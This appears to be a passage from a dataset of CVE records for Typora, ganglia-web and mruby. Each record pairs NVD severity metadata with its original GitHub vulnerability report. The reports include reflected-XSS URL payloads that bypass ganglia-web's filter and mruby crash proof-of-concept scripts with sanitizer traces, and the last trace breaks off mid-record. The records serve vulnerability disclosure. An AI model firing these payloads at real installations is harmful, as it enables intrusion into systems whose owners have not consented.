Policy](https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP) for a broader mitigation. It appears that RCE via XSS emerges as a pattern among Typora's issues. Implementing a fine-tuned CSP is time consuming but building a good policy step by step could prove worthy in the long run and cover users even when new XSS vectors are discovered. # Notes Versions known to be vulnerable and tested are 0.9.81, 0.9.9.31.2 (3946). These are the latest downloads from the website (for Linux and MacOS respectively). I did not test the Windows version of the app. # CVSS 8.3 My take is [CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H&version=3.1) // Mark Art at Havoc Research
Typora RCE via mXSS
https://api.github.com/repos/typora/typora-issues/issues/3124/comments
2
2019-12-27T22:37:51Z
2020-02-25T15:36:23Z
https://github.com/typora/typora-issues/issues/3124
543,010,305
3,124
1,002
CVE-2019-20378
2020-01-11T03:15:10.730
ganglia-web (aka Ganglia Web Frontend) through 3.7.5 allows XSS via the header.php ce parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ganglia/ganglia-web/issues/351" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ganglia/ganglia-web/issues/351" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ganglia:ganglia-web:*:*:*:*:*:*:*:*", "matchCriteriaId": "EE611052-8336-4023-AA79-AEB5D33DFCB9", "versionEndExcluding": null, "versionEndIncluding": "3.7.5", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/ganglia/ganglia-web/issues/351
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ganglia", "ganglia-web" ]
When I visited the installed web page , I found this version has 2 Reflect Cross-site scripting (XSS) in the page. I found the apt-get installed the version 3.6.1 of ganglia-webfrontend default, maybe there are many ganglia users used apt-get to installed this ganglia-webfrontend version. header.php 411 $custom_time = "or <span class=\"nobr\">from <input type=\"TEXT\" title=\"$examples\" NAME=\"cs\" ID=\"datepicker-cs\" SIZE=\"17\""; 412 if ($cs) 413 $custom_time .= " value=\"$cs\""; 414 $custom_time .= "> to <input type=\"TEXT\" title=\"$examples\" name=\"ce\" ID=\"datepicker-ce\" SIZE=\"17\""; 415 if ($ce) 416 $custom_time .= " value=\"$ce\""; 417 $custom_time .= "> <input type=\"submit\" value=\"Go\">\n"; There some xss protect in the systen but can be by pass. attacter can use “onfocus” and “autofocus” to bypass. url1: /ganglia/?r=hour&cs=&ce=hou7z%22%20onfocus%3ddocument.location%3d1%20autofocus%3d%20oqqfa&c=unspecified&h=&tab=m&vn=&hide-hf=false url2: /ganglia/?r=hour&cs=quxfd%22%20onfocus%3ddocument.location%3d1%20autofocus%3d%20wp7f3&ce=&c=unspecified&h=&tab=m&vn=&hide-hf=false **Please confirm is it a serurity vulnerability .**
Two XSS issue found in 3.6.1
https://api.github.com/repos/ganglia/ganglia-web/issues/351/comments
4
2019-12-17T01:38:44Z
2024-02-16T04:44:29Z
https://github.com/ganglia/ganglia-web/issues/351
538,781,783
351
1,003
CVE-2020-6838
2020-01-11T03:15:10.950
In mruby 2.1.0, there is a use-after-free in hash_values_at in mrbgems/mruby-hash-ext/src/hash-ext.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/mruby/mruby/issues/4926" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/mruby/mruby/issues/4926" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mruby:mruby:2.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "853BAA9F-67B8-40FB-95CC-C23CF1FAA31E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/mruby/mruby/issues/4926
[ "Exploit", "Third Party Advisory" ]
github.com
[ "mruby", "mruby" ]
compile mruby in ubuntu18.04 64 bit with ASAN. poc: ``` a=0 b="asdfasdfasdf adaf asdf asdfa sdf asdfasdfasdfa sdf" c={1=>1, 2=>"foo", "foo"=>nil, nil=> nil} d=[1,nil," sdfg"] srand(1337) a = c.values_at(b,a,b,d,c,a,d,d,c,d,b,b,b,b,d,c,a,c,a,d,d,b,a,c,d,c,c,b,c,a,a,b,d,b,d,c,c,a,a,b,c,a,d,c,b,b,c,c,d,a,c,d,d,a,c,b,a,d,b,b,b,a,c,b,d,a,a,a,b,a,b,b,a,a,d,a,b,b,c,b,c,d,a,b,a,b,c,a,b,d,c,b,b,d,b,a,d,c,c,d,a,d,c,a,c,c,a,b,d,c,a,d,a,b,c,d,b,c,d,a){|| } ``` ``` ==96660==ERROR: AddressSanitizer: heap-use-after-free on address 0x61d000000af0 at pc 0x0000007bd8e8 bp 0x7fffffff09b0 sp 0x7fffffff09a8 READ of size 8 at 0x61d000000af0 thread T0 [New process 96922] [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". process 96922 is executing new program: /home/casper/fuzz/fuzzdeps/llvm9/bin/llvm-symbolizer [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". #0 0x7bd8e7 in hash_values_at /home/casper/targets/gramma/mruby/dbg/BUILD/mrbgems/mruby-hash-ext/src/hash-ext.c:33:31 #1 0x59356f in mrb_vm_exec /home/casper/targets/gramma/mruby/dbg/BUILD/src/vm.c:1444:18 #2 0x583324 in mrb_vm_run /home/casper/targets/gramma/mruby/dbg/BUILD/src/vm.c:947:12 #3 0x5da14f in mrb_top_run /home/casper/targets/gramma/mruby/dbg/BUILD/src/vm.c:2850:12 #4 0x6a450d in mrb_load_exec /home/casper/targets/gramma/mruby/dbg/BUILD/mrbgems/mruby-compiler/core/parse.y:6438:7 #5 0x6a521d in mrb_load_file_cxt /home/casper/targets/gramma/mruby/dbg/BUILD/mrbgems/mruby-compiler/core/parse.y:6447:10 #6 0x4f24ff in main /home/casper/targets/gramma/mruby/dbg/BUILD/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:327:11 #7 0x7ffff6a9bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 #8 0x41c479 in _start (/home/casper/targets/gramma/mruby/dbg/fuzzrun/mruby+0x41c479) 0x61d000000af0 is located 112 bytes inside of 2048-byte region [0x61d000000a80,0x61d000001280) freed by thread T0 here: #0 0x4a9388 in realloc /home/casper/fuzz/fuzzdeps/llvm-9.0.0.src/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:164 #1 0x543a35 in mrb_default_allocf /home/casper/targets/gramma/mruby/dbg/BUILD/src/state.c:56:12 #2 0x4f56ab in mrb_realloc_simple /home/casper/targets/gramma/mruby/dbg/BUILD/src/gc.c:209:8 #3 0x4f5dae in mrb_realloc /home/casper/targets/gramma/mruby/dbg/BUILD/src/gc.c:223:8 #4 0x575629 in stack_extend_alloc /home/casper/targets/gramma/mruby/dbg/BUILD/src/vm.c:203:27 #5 0x575158 in mrb_stack_extend /home/casper/targets/gramma/mruby/dbg/BUILD/src/vm.c:224:5 #6 0x578f57 in mrb_funcall_with_block /home/casper/targets/gramma/mruby/dbg/BUILD/src/vm.c:500:5 #7 0x576ce5 in mrb_funcall_argv /home/casper/targets/gramma/mruby/dbg/BUILD/src/vm.c:539:10 #8 0x576786 in mrb_funcall /home/casper/targets/gramma/mruby/dbg/BUILD/src/vm.c:400:10 #9 0x65d032 in mrb_eql /home/casper/targets/gramma/mruby/dbg/BUILD/src/object.c:639:10 #10 0x670138 in ht_hash_equal /home/casper/targets/gramma/mruby/dbg/BUILD/src/hash.c:126:22 #11 0x660f09 in ht_get /home/casper/targets/gramma/mruby/dbg/BUILD/src/hash.c:458:11 #12 0x660276 in mrb_hash_get /home/casper/targets/gramma/mruby/dbg/BUILD/src/hash.c:711:7 #13 0x7bd97b in hash_values_at /home/casper/targets/gramma/mruby/dbg/BUILD/mrbgems/mruby-hash-ext/src/hash-ext.c:33:31 #14 0x59356f in mrb_vm_exec /home/casper/targets/gramma/mruby/dbg/BUILD/src/vm.c:1444:18 #15 0x583324 in mrb_vm_run /home/casper/targets/gramma/mruby/dbg/BUILD/src/vm.c:947:12 #16 0x5da14f in mrb_top_run /home/casper/targets/gramma/mruby/dbg/BUILD/src/vm.c:2850:12 #17 0x6a450d in mrb_load_exec /home/casper/targets/gramma/mruby/dbg/BUILD/mrbgems/mruby-compiler/core/parse.y:6438:7 #18 0x6a521d in mrb_load_file_cxt /home/casper/targets/gramma/mruby/dbg/BUILD/mrbgems/mruby-compiler/core/parse.y:6447:10 #19 0x4f24ff in main /home/casper/targets/gramma/mruby/dbg/BUILD/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:327:11 #20 0x7ffff6a9bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 previously allocated by thread T0 here: #0 0x4a9388 in realloc /home/casper/fuzz/fuzzdeps/llvm-9.0.0.src/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:164 #1 0x543a35 in mrb_default_allocf /home/casper/targets/gramma/mruby/dbg/BUILD/src/state.c:56:12 #2 0x4f56ab in mrb_realloc_simple /home/casper/targets/gramma/mruby/dbg/BUILD/src/gc.c:209:8 #3 0x4f5dae in mrb_realloc /home/casper/targets/gramma/mruby/dbg/BUILD/src/gc.c:223:8 #4 0x4f6563 in mrb_malloc /home/casper/targets/gramma/mruby/dbg/BUILD/src/gc.c:245:10 #5 0x4f6608 in mrb_calloc /home/casper/targets/gramma/mruby/dbg/BUILD/src/gc.c:263:9 #6 0x57a507 in stack_init /home/casper/targets/gramma/mruby/dbg/BUILD/src/vm.c:131:28 #7 0x577be9 in mrb_funcall_with_block /home/casper/targets/gramma/mruby/dbg/BUILD/src/vm.c:461:7 #8 0x5774fc in mrb_funcall_with_block /home/casper/targets/gramma/mruby/dbg/BUILD/src/vm.c:439:13 #9 0x576ce5 in mrb_funcall_argv /home/casper/targets/gramma/mruby/dbg/BUILD/src/vm.c:539:10 #10 0x63e56b in mrb_obj_new /home/casper/targets/gramma/mruby/dbg/BUILD/src/class.c:1553:5 #11 0x5e4894 in mrb_exc_new_str /home/casper/targets/gramma/mruby/dbg/BUILD/src/error.c:31:10 #12 0x5f00df in mrb_init_exception /home/casper/targets/gramma/mruby/dbg/BUILD/src/error.c:574:20 #13 0x6c4c94 in mrb_init_core /home/casper/targets/gramma/mruby/dbg/BUILD/src/init.c:42:3 #14 0x5439cb in mrb_open_core /home/casper/targets/gramma/mruby/dbg/BUILD/src/state.c:43:3 #15 0x543a9c in mrb_open_allocf /home/casper/targets/gramma/mruby/dbg/BUILD/src/state.c:71:20 #16 0x543a6a in mrb_open /home/casper/targets/gramma/mruby/dbg/BUILD/src/state.c:63:20 #17 0x4f0cea in main /home/casper/targets/gramma/mruby/dbg/BUILD/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:253:20 #18 0x7ffff6a9bb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: heap-use-after-free /home/casper/targets/gramma/mruby/dbg/BUILD/mrbgems/mruby-hash-ext/src/hash-ext.c:33:31 in hash_values_at Shadow bytes around the buggy address: 0x0c3a7fff8100: fd fd fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c3a7fff8110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c3a7fff8120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c3a7fff8130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c3a7fff8140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c3a7fff8150: fd fd fd fd fd fd fd fd fd fd fd fd fd fd[fd]fd 0x0c3a7fff8160: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c3a7fff8170: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c3a7fff8180: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c3a7fff8190: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c3a7fff81a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==96660==ABORTING [Inferior 2 (process 96922) exited normally] ```
heap use after free in hash_values_at in mrbgems/mruby-hash-ext/src/hash-ext.c:33
https://api.github.com/repos/mruby/mruby/issues/4926/comments
2
2020-01-10T08:47:38Z
2020-01-27T22:04:00Z
https://github.com/mruby/mruby/issues/4926
547,943,851
4,926
1,004
CVE-2020-6839
2020-01-11T03:15:11.027
In mruby 2.1.0, there is a stack-based buffer overflow in mrb_str_len_to_dbl in string.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/mruby/mruby/issues/4929" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/mruby/mruby/issues/4929" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mruby:mruby:2.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "853BAA9F-67B8-40FB-95CC-C23CF1FAA31E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/mruby/mruby/issues/4929
[ "Exploit", "Third Party Advisory" ]
github.com
[ "mruby", "mruby" ]
build mruby in ubuntu18.04 64 bit with ASAN poc: ``` a=0 b="asdfasdfasdf adaf asdf asdfa sdf asdfasdfasdfa sdf" c={1=>1, 2=>"foo", "foo"=>nil, nil=> nil} d=[1,nil," sdfg"] srand(1337) a = d.prepend(c,c,){|| } d = d.reverse(){|| } b = b.rstrip(){|| } a = d.join(){|| } a = d.Float(a,){|| } ``` result: ``` ==312==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fff44aed8c6 at pc 0x000000605489 bp 0x7fff44aed850 sp 0x7fff44aed848 WRITE of size 1 at 0x7fff44aed8c6 thread T0 #0 0x605488 in mrb_str_len_to_dbl /home/casper/targets/gramma/mruby/dbg/BUILD/src/string.c:2542:12 #1 0x6037d9 in mrb_str_to_dbl /home/casper/targets/gramma/mruby/dbg/BUILD/src/string.c:2576:10 #2 0x65a8eb in mrb_Float /home/casper/targets/gramma/mruby/dbg/BUILD/src/object.c:560:35 #3 0x7dd373 in mrb_f_float /home/casper/targets/gramma/mruby/dbg/BUILD/mrbgems/mruby-kernel-ext/src/kernel.c:134:10 #4 0x59356f in mrb_vm_exec /home/casper/targets/gramma/mruby/dbg/BUILD/src/vm.c:1444:18 #5 0x583324 in mrb_vm_run /home/casper/targets/gramma/mruby/dbg/BUILD/src/vm.c:947:12 #6 0x5da14f in mrb_top_run /home/casper/targets/gramma/mruby/dbg/BUILD/src/vm.c:2850:12 #7 0x6a450d in mrb_load_exec /home/casper/targets/gramma/mruby/dbg/BUILD/mrbgems/mruby-compiler/core/parse.y:6438:7 #8 0x6a521d in mrb_load_file_cxt /home/casper/targets/gramma/mruby/dbg/BUILD/mrbgems/mruby-compiler/core/parse.y:6447:10 #9 0x4f24ff in main /home/casper/targets/gramma/mruby/dbg/BUILD/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:327:11 #10 0x7f81ecde2b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 #11 0x41c479 in _start (/home/casper/targets/gramma/mruby/dbg/fuzzrun/mruby+0x41c479) Address 0x7fff44aed8c6 is located in stack of thread T0 at offset 102 in frame #0 0x604a3f in mrb_str_len_to_dbl /home/casper/targets/gramma/mruby/dbg/BUILD/src/string.c:2493 This frame has 4 object(s): [32, 102) 'buf' (line 2494) <== Memory access at offset 102 overflows this variable [144, 152) 'end' (line 2497) [176, 192) 'x' (line 2506) [208, 224) 'tmp' (line 2509) HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow /home/casper/targets/gramma/mruby/dbg/BUILD/src/string.c:2542:12 in mrb_str_len_to_dbl Shadow bytes around the buggy address: 0x100068955ac0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100068955ad0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100068955ae0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100068955af0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100068955b00: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 =>0x100068955b10: 00 00 00 00 00 00 00 00[06]f2 f2 f2 f2 f2 00 f2 0x100068955b20: f2 f2 f8 f8 f2 f2 f8 f8 f3 f3 f3 f3 00 00 00 00 0x100068955b30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100068955b40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100068955b50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100068955b60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==312==ABORTING ```
stack overflow in mrb_str_len_to_dbl in src/string.c:2542
https://api.github.com/repos/mruby/mruby/issues/4929/comments
3
2020-01-10T08:51:54Z
2020-01-27T21:56:59Z
https://github.com/mruby/mruby/issues/4929
547,945,726
4,929
1,005
CVE-2020-6840
2020-01-11T03:15:11.090
In mruby 2.1.0, there is a use-after-free in hash_slice in mrbgems/mruby-hash-ext/src/hash-ext.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/mruby/mruby/issues/4927" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/mruby/mruby/issues/4927" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mruby:mruby:2.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "853BAA9F-67B8-40FB-95CC-C23CF1FAA31E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/mruby/mruby/issues/4927
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "mruby", "mruby" ]
build mruby in ubuntu18.04 64 bit with ASAN poc: ``` a=0 b="asdfasdfasdf adaf asdf asdfa sdf asdfasdfasdfa sdf" c={1=>1, 2=>"foo", "foo"=>nil, nil=> nil} d=[1,nil," sdfg"] srand(1337) a = d.instance_eval(){|| } a = c.slice(c,c,a,c,c,d,d,c,c,a,a,c,b,a,c,c,a,d,d,b,a,a,a,c,d,b,a,d,a,a,d,d,c,c,a,d,a,a,b,d,b,c,c,a,c,c,c,a,c,b,d,d,b,b,d,a,c,c,a,c,a,c,c,c,c,b,c,a,d,b,d,c,b,d,a,b,a,a,d,b,a,a,a,d,c,b,b,c,a,c,b,b,c,d,a,d,b,b,c,a,a,d,b,b,c,d,d,c,a,a,a,d,a,d,d,c,c,b,c,){|| } ``` result: ``` ==47556==ERROR: AddressSanitizer: heap-use-after-free on address 0x61d000000af0 at pc 0x0000004a8122 bp 0x7ffeb5a96a50 sp 0x7ffeb5a96200 READ of size 16 at 0x61d000000af0 thread T0 #0 0x4a8121 in __asan_memcpy /home/casper/fuzz/fuzzdeps/llvm-9.0.0.src/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:22 #1 0x7be22c in hash_slice /home/casper/targets/gramma/mruby/dbg/BUILD/mrbgems/mruby-hash-ext/src/hash-ext.c:61:21 #2 0x59356f in mrb_vm_exec /home/casper/targets/gramma/mruby/dbg/BUILD/src/vm.c:1444:18 #3 0x583324 in mrb_vm_run /home/casper/targets/gramma/mruby/dbg/BUILD/src/vm.c:947:12 #4 0x5da14f in mrb_top_run /home/casper/targets/gramma/mruby/dbg/BUILD/src/vm.c:2850:12 #5 0x6a450d in mrb_load_exec /home/casper/targets/gramma/mruby/dbg/BUILD/mrbgems/mruby-compiler/core/parse.y:6438:7 #6 0x6a521d in mrb_load_file_cxt /home/casper/targets/gramma/mruby/dbg/BUILD/mrbgems/mruby-compiler/core/parse.y:6447:10 #7 0x4f24ff in main /home/casper/targets/gramma/mruby/dbg/BUILD/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:327:11 #8 0x7f3a58255b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 #9 0x41c479 in _start (/home/casper/targets/gramma/mruby/dbg/fuzzrun/mruby+0x41c479) 0x61d000000af0 is located 112 bytes inside of 2048-byte region [0x61d000000a80,0x61d000001280) freed by thread T0 here: #0 0x4a9388 in realloc /home/casper/fuzz/fuzzdeps/llvm-9.0.0.src/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:164 #1 0x543a35 in mrb_default_allocf /home/casper/targets/gramma/mruby/dbg/BUILD/src/state.c:56:12 #2 0x4f56ab in mrb_realloc_simple /home/casper/targets/gramma/mruby/dbg/BUILD/src/gc.c:209:8 #3 0x4f5dae in mrb_realloc /home/casper/targets/gramma/mruby/dbg/BUILD/src/gc.c:223:8 #4 0x575629 in stack_extend_alloc /home/casper/targets/gramma/mruby/dbg/BUILD/src/vm.c:203:27 #5 0x575158 in mrb_stack_extend /home/casper/targets/gramma/mruby/dbg/BUILD/src/vm.c:224:5 #6 0x578f57 in mrb_funcall_with_block /home/casper/targets/gramma/mruby/dbg/BUILD/src/vm.c:500:5 #7 0x576ce5 in mrb_funcall_argv /home/casper/targets/gramma/mruby/dbg/BUILD/src/vm.c:539:10 #8 0x576786 in mrb_funcall /home/casper/targets/gramma/mruby/dbg/BUILD/src/vm.c:400:10 #9 0x65d032 in mrb_eql /home/casper/targets/gramma/mruby/dbg/BUILD/src/object.c:639:10 #10 0x670138 in ht_hash_equal /home/casper/targets/gramma/mruby/dbg/BUILD/src/hash.c:126:22 #11 0x660f09 in ht_get /home/casper/targets/gramma/mruby/dbg/BUILD/src/hash.c:458:11 #12 0x6629c5 in mrb_hash_fetch /home/casper/targets/gramma/mruby/dbg/BUILD/src/hash.c:728:7 #13 0x7be48e in hash_slice /home/casper/targets/gramma/mruby/dbg/BUILD/mrbgems/mruby-hash-ext/src/hash-ext.c:64:11 #14 0x59356f in mrb_vm_exec /home/casper/targets/gramma/mruby/dbg/BUILD/src/vm.c:1444:18 #15 0x583324 in mrb_vm_run /home/casper/targets/gramma/mruby/dbg/BUILD/src/vm.c:947:12 #16 0x5da14f in mrb_top_run /home/casper/targets/gramma/mruby/dbg/BUILD/src/vm.c:2850:12 #17 0x6a450d in mrb_load_exec /home/casper/targets/gramma/mruby/dbg/BUILD/mrbgems/mruby-compiler/core/parse.y:6438:7 #18 0x6a521d in mrb_load_file_cxt /home/casper/targets/gramma/mruby/dbg/BUILD/mrbgems/mruby-compiler/core/parse.y:6447:10 #19 0x4f24ff in main /home/casper/targets/gramma/mruby/dbg/BUILD/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:327:11 #20 0x7f3a58255b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 previously allocated by thread T0 here: #0 0x4a9388 in realloc /home/casper/fuzz/fuzzdeps/llvm-9.0.0.src/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:164 #1 0x543a35 in mrb_default_allocf /home/casper/targets/gramma/mruby/dbg/BUILD/src/state.c:56:12 #2 0x4f56ab in mrb_realloc_simple /home/casper/targets/gramma/mruby/dbg/BUILD/src/gc.c:209:8 #3 0x4f5dae in mrb_realloc /home/casper/targets/gramma/mruby/dbg/BUILD/src/gc.c:223:8 #4 